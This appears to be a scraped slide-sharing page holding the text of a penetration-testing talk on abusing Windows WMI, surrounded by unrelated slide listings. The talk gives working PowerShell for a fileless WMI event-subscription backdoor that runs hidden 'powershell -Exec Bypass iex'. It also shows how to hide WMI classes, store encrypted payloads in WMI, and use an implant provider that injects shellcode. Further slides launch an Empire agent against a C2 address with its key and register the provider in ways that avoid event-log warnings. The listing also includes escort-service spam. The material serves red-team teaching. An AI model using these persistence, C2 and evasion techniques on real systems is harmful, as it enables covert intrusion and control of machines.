Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
 
Understanding AzMan In Hyper-V
Understanding AzMan In Hyper-VUnderstanding AzMan In Hyper-V
Understanding AzMan In Hyper-V
 
Serverless security: defense against the dark arts
Serverless security: defense against the dark artsServerless security: defense against the dark arts
Serverless security: defense against the dark arts
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Automating That "Other" OS
Automating That "Other" OSAutomating That "Other" OS
Automating That "Other" OS
 
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
 
WMI - A FRONT DOOR FOR MALWARES
WMI - A FRONT DOOR FOR MALWARESWMI - A FRONT DOOR FOR MALWARES
WMI - A FRONT DOOR FOR MALWARES
 
Hacking_PPT
Hacking_PPT Hacking_PPT
Hacking_PPT
 
Security, Automation and the Software Supply Chain
Security, Automation and the Software Supply ChainSecurity, Automation and the Software Supply Chain
Security, Automation and the Software Supply Chain
 
Malware Detection With Multiple Features
Malware Detection With Multiple FeaturesMalware Detection With Multiple Features
Malware Detection With Multiple Features
 
Continuous Delivery of Cloud Applications with Docker Containers and IBM Bluemix
Continuous Delivery of Cloud Applications with Docker Containers and IBM BluemixContinuous Delivery of Cloud Applications with Docker Containers and IBM Bluemix
Continuous Delivery of Cloud Applications with Docker Containers and IBM Bluemix
 

Dernier

TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Dernier (20)

TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 

WMI for Penetration Testers - Arcticcon 2017

  • 1. 1 Confidential & Proprietary WHO AM I  Alexander Leary  Senior Network & Application Pentester at NetSPI  Twitter: 0xbadjuju  KeyBase: 0xbadjuju  Blogs: https://blog.netspi.com/author/aleary/  Code: https://github.com/0xbadjuju/
  • 2. 2 Confidential & Proprietary OUTLINE 1. WMI Overview 2. WMI Event Subscriptions 3. WMI for Storage 4. WMI Providers 5. Installing WMI Providers https://github.com/0xbadjuju/PowerProvider https://github.com/0xbadjuju/WheresMyImplant
  • 3. 3 Confidential & Proprietary WHAT IS WMI?  Windows Management Instrumentation  Present since Windows 95  It shows  Probably familiar with some WMI functions  Win32_Process -> Create()  wmic.exe process call create …  Invoke-WmiMethod –class win32_process –name create –argumentlist …
  • 4. 4 Confidential & Proprietary WMI OVERVIEW  WMI  Namespace  Class  Property  Static || Dynamic  Method  WQL  SELECT * from class;  SQL Server  Database  Table  Row  Static  Stored Procedure  SQL  SELECT * FROM table;
  • 5. 5 Confidential & Proprietary USEFUL QUERIES StdRegProv Invoke-WmiMethod -Class StdRegProv -Name CreateKey -ArgumentList $HKLM, "$Key$Value" AntiVirusProduct Get-WmiObject -Namespace ROOT/SecurityCenter2 -Class AntiVirusProduct Win32_Directory Get-CimInstance -Query "SELECT * FROM Win32_Directory WHERE Drive = 'C:' AND Path = '’” CIM_DataFile (Get-CimInstance -Query "SELECT * FROM CIM_DataFile WHERE Drive = 'C:' AND Path = ''").Name Win32_Service (Get-WmiObject Win32_Service | ? Name -Eq LogWatcher).StopService()
  • 6. 6 Confidential & Proprietary USER HUNTING (Get-WmiObject Win32_LoggedOnUser -ComputerName $ComputerName).Antecedent | % {$split = $_.split("`""); $username = $split[1]+""+$split[3]; $username} | Get-Unique (Get-CimInstance Win32_LoggedOnUser -ComputerName $ComputerName).Antecedent | Select Domain,Name -Unique Get-WmiObject Win32_LogonSession -ComputerName $ComputerName | %{Get-WmiObject -Query "ASSOCIATORS OF {Win32_LogonSession.LogonId=$($_.LogonId)} WHERE ResultClass=Win32_UserAccount” -ComputerName $ComputerName} Get-WmiObject -Class Win32_Process -ComputerName $ComputerName | %{$_.GetOwner()} | Select domain, user -Unique
  • 7. 7 Confidential & Proprietary7 Confidential & Proprietary WMI EVENT SUBSCRIPTIONS INVOKE-WMIDUPLICATECLASS
  • 8. 8 Confidential & Proprietary WMI CLASS INHERITANCE  WMI has a robust implementation of class inheritance  CIM_ManagedSystemElement  CIM_LogicalElement  CIM_Process  Win32_Process  ???
  • 9. 9 Confidential & Proprietary DUPLICATING A WMI CLASS $NewManagementClass = $ManagementClass.Derive($DerivedClassName) $NewManagementClass.put() $NewManagementClass = $ManagementClass.Clone($ClonedClassName) $NewManagementClass.put() https://twitter.com/mattifestation/status/907702749193633792
  • 10. 10 Confidential & Proprietary HIDING WMI METHODS Invoke-WMIDuplicateClass -TargetClassName Win32_Process -DuplicateClassName Win32_Create -ComputerName $ComputerName -Credential $Credential
  • 11. 11 Confidential & Proprietary
  • 12. 12 Confidential & Proprietary Binding WMI FILELESS BACKDOORS  EventFilter  __EventFilter  Consumers  ComandLineEventConsumer  ActiveScriptEventConsumer  Binding  __FilterToConsumberBinding  Well Known and Documented Technique  https://github.com/Sw4mpf0x/PowerLurk  https://blog.netspi.com/ Event Filter (Trigger) Consumer (Action)
  • 13. 13 Confidential & Proprietary EVENT FILTER + CONSUMER EXAMPLE $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{ EventNamespace = 'root/cimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
  • 14. 14 Confidential & Proprietary INVOKE-WMIDUPLICATECLASS Invoke-WMIDuplicateClass -TargetClassName CommandLineEventConsumer -DuplicateClassName DerivedEventConsumer -NameSpace ROOTSubscription ComputerName $ComputerName -Credential $Credential –Verbose $Filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter -Arguments @{ EventNamespace = 'rootcimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace rootsubscription -Class DerivedEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace rootsubscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
  • 15. 15 Confidential & Proprietary
  • 16. 16 Confidential & Proprietary16 Confidential & Proprietary WMI FOR STORAGE INVOKE-WMIFS
  • 17. 17 Confidential & Proprietary INVOKE-WMIFS 1. Create a WMI class to store file in  New-WMIFSClass 2. Read in file and base64 encode and encrypt  ConvertTo-Base64 & ConvertTo-EncryptedText 3. Slice the base64 encoded string and insert into WMI  Invoke-InsertFileThreaded 4. Retrieve the file and reassemble  Invoke-RetrieveFile 5. Base64, decrypt file, and optionally write to disk  ConvertFrom-Base64 & ConvertFrom-EncryptedText Wrapped into Invoke-WMIUpload & Invoke-WMIRemoteExtract
  • 18. 18 Confidential & Proprietary
  • 19. 19 Confidential & Proprietary19 Confidential & Proprietary WMI PROVIDERS WHERESMYIMPLANT
  • 20. 20 Confidential & Proprietary WMI PROVIDERS  These are the DLL’s behind the scenes that do all the work  Host the methods and properties that we call  cimwin32.dll  What about building our own provider?  Build the provider  Register the provider  Access the provider
  • 21. 21 Confidential & Proprietary HOW TO CREATE A PROVIDER  WmiPrvSe.exe can host the Common Language Runtime (CLR)  Opens up .Net for use in WMI  Add a few decorators  [ManagementEntity]  [ManagementTask]  Remove calls to stdin, stdout, and stderr  PowerShell Command Execution  https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider  ShellCode Runner  https://github.com/subTee/EvilWMIProvider
  • 22. 22 Confidential & Proprietary
  • 23. 23 Confidential & Proprietary WMI BACKDOOR 1. Base64 Encode Payload 2. Store Payload as Base64 Encoded String in WMI 3. Extract as a byte array and then inject the payload  Supported Payloads:  ShellCode, Dll, PE
  • 24. 24 Confidential & Proprietary
  • 25. 25 Confidential & Proprietary
  • 26. 26 Confidential & Proprietary
  • 27. 27 Confidential & Proprietary
  • 28. 28 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Agent? Why not? $language = “dotnet” || “powershell” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
  • 29. 29 Confidential & Proprietary EMPIRE - .NET AGENT
  • 30. 30 Confidential & Proprietary30 Confidential & Proprietary REGISTERING WMI PROVIDERS INSTALL-WMIPROVIDER
  • 31. 31 Confidential & Proprietary INSTALLUTIL.EXE PS C:> InstallUtil.exe assembly.dll PS C:> InstallUtil.exe /u assembly.dll In the Windows Event Log this triggers a warning.
  • 32. 32 Confidential & Proprietary .NET MANAGEDINSTALLERCLASS PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @( "C:assembly.dll") ) PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @(“/u”, "C:assembly.dll") ) The PS version and .net assembly version need to match. In the Windows Event Log this also triggers a warning.
  • 33. 33 Confidential & Proprietary
  • 34. 34 Confidential & Proprietary MANUAL REGISTRATION  What if we were to register the WMI Provider purely through WMI calls  This does not come close to fitting on a slide 1. Create the WMI_extension Class 2. Create an instance of WMI_extension for the Win32_Implant Class 3. Create an instance of __InstanceProviderRegistration for WMI_extension 4. Create an instance of __MethodProviderRegistration for WMI_extension 5. Create the Win32_Implant Class 6. Register WMI_extension in HKCR and HKLM
  • 35. 35 Confidential & Proprietary MANUAL REGISTRATION That looks hard
  • 36. 36 Confidential & Proprietary MANUAL REGISTRATION Why would I want to do that?  Manually registering a WMI provider allows us to bypass calling any executables on the remote system  Remember those pesky Windows Event Logs warnings?  Those are caused by the default hosting model LocalSystemHost  There are many, many others to choose from.  Win32_Process -> Create() uses NetworkServiceHost  Wanna guess that that HostingModel doesn’t do?
  • 37. 37 Confidential & Proprietary MANUAL REGISTRATION Install-WMIProviderExtension -ComputerName $ComputerName -Credential $Credential -RemoteLibraryLocation C:WindowsSystem32wbemWheresMyImplant.dll -ProviderDisplayName Win32_Implant -HostingModel NetworkServiceHost:CLR
  • 38. 38 Confidential & Proprietary
  • 39. 39 Confidential & Proprietary  Applications and Service Logs / Microsoft / Windows / WMI Activity https://msdn.microsoft.com/en-us/library/aa826686(v=vs.85).aspx
  • 40. 40 Confidential & Proprietary Questions?